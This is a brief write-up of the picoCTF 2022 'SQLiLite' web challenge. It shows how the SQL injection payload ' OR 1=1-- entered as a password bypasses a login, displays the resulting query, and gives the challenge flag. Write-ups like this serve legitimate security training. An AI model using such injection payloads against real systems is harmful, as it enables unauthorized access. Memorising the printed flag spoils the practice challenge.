Rating:
# SQLiLite - picoCTF 2022 - CMU Cybersecurity Competition
Web Exploitation, 200 Points
## Description
![info.JPG](images/info.JPG)
## SQLiLite Solution
By browsing the [website](http://saturn.picoctf.net:53389/) from the challenge description we can see the following web page:
![webpage.JPG](images/website.JPG)
If we are trying to log in using ```admin:admin``` we get the following web page:
![adminadmin.JPG](images/admin.JPG)
We can see the SQL query, We can simply use SQL injection ```' OR 1=1--``` as a password, By using this SQL injection we get:
![success.JPG](images/success.JPG)
Now, By observing the source code we get the flag ```picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}```:
```html
username: admin<h1>Logged in! But can you see the flag, it is in plainsight.</h1>
password: ' OR 1=1--
SQL query: SELECT * FROM users WHERE name='admin' AND password='' OR 1=1--'
Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}